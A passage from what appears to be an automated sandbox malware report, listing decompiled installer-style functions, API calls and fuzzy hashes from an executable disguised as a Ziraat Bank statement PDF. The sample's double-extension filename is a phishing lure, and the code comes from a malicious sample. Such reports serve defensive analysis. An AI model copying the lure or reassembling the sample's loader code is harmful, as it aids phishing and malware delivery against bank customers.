                                                    0x00405d47
                                                    0x00405d57
                                                    0x00405d63
                                                    0x00405d67
                                                    0x00405d67
                                                    0x00000000
                                                    0x00405d59
                                                    0x00000000
                                                    0x00405d5b

                                                    APIs
                                                      • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                      • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                    • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: File$Attributes$DeleteDirectoryRemove
                                                    • String ID:
                                                    • API String ID: 1655745494-0
                                                    • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                    • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                                    • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                    • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406AE0 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00406AE0(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A71(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                                                    0x00406af1
                                                    0x00406b08
                                                    0x00406afc
                                                    0x00406b06
                                                    0x00406b06
                                                    0x00406b13
                                                    0x00406b1f

                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                                    • GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: ObjectSingleWait$CodeExitProcess
                                                    • String ID:
                                                    • API String ID: 2567322000-0
                                                    • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                    • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                                    • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                    • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004061DB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                    0x004061df
                                                    0x004061ef
                                                    0x004061f7
                                                    0x00000000
                                                    0x004061fe
                                                    0x00000000
                                                    0x00406200

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,FreeEnvironmentStringsW,0040CEF0,004035F5,?,?,004034F9,FreeEnvironmentStringsW,00004000,?,00000000,004033A3), ref: 004061EF
                                                    Strings
                                                    • FreeEnvironmentStringsW, xrefs: 004061DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: FreeEnvironmentStringsW
                                                    • API String ID: 2738559852-472878650
                                                    • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                    • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                    • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                    • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 69%
                                                    			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}











                                                    0x0040138a
                                                    0x004013fa
                                                    0x0040139b
                                                    0x004013a0
                                                    0x00000000
                                                    0x00000000
                                                    0x004013a2
                                                    0x004013a3
                                                    0x004013ad
                                                    0x00000000
                                                    0x00401404
                                                    0x004013b0
                                                    0x004013b7
                                                    0x004013bd
                                                    0x004013be
                                                    0x004013c0
                                                    0x004013c2
                                                    0x004013b9
                                                    0x004013b9
                                                    0x004013ba
                                                    0x004013ba
                                                    0x004013c9
                                                    0x004013cb
                                                    0x004013f4
                                                    0x004013f4
                                                    0x004013c9
                                                    0x00000000

                                                    APIs
                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                    • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                    • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                    • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                    0x00405c54
                                                    0x00405c74
                                                    0x00405c7c
                                                    0x00405c81
                                                    0x00000000
                                                    0x00405c87
                                                    0x00405c8b

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateHandleProcess
                                                    • String ID:
                                                    • API String ID: 3712363035-0
                                                    • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                    • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                    • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                    • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                    0x00406a3d
                                                    0x00406a40
                                                    0x00406a47
                                                    0x00406a4f
                                                    0x00406a5b
                                                    0x00000000
                                                    0x00406a62
                                                    0x00406a52
                                                    0x00406a59
                                                    0x00000000
                                                    0x00406a6a
                                                    0x00000000

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                      • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                      • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                      • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                    • String ID:
                                                    • API String ID: 2547128583-0
                                                    • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                    • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                    • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                    • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                    0x0040615c
                                                    0x00406169
                                                    0x0040617e
                                                    0x00406184

                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesCreate
                                                    • String ID:
                                                    • API String ID: 415043291-0
                                                    • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                    • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                    • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                    • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                                                    0x00406138
                                                    0x0040613e
                                                    0x00406143
                                                    0x0040614c
                                                    0x0040614c
                                                    0x00406155

                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                    • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                    • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                    • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                    • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                    0x00405c1c
                                                    0x00405c24
                                                    0x00000000
                                                    0x00405c2a
                                                    0x00000000

                                                    APIs
                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                    • GetLastError.KERNEL32 ref: 00405C2A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryErrorLast
                                                    • String ID:
                                                    • API String ID: 1375471231-0
                                                    • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                    • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                    • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                    • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                    0x0040620e
                                                    0x0040621e
                                                    0x00406226
                                                    0x00000000
                                                    0x0040622d
                                                    0x00000000
                                                    0x0040622f

                                                    APIs
                                                    • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040FA10,0040CEF0,00403579,0040CEF0,0040FA10,FreeEnvironmentStringsW,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                    • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                    • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                    0x00403606
                                                    0x0040360c

                                                    APIs
                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                    • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                    • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                    • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7);
